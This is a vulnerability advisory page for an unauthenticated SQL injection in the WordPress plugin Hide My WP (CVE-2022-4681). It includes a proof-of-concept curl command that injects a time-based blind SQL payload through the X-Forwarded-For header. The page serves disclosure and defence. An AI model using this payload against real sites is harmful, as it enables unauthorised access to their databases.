WordPress Hide My WP SQL Injection

2024.03.11
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top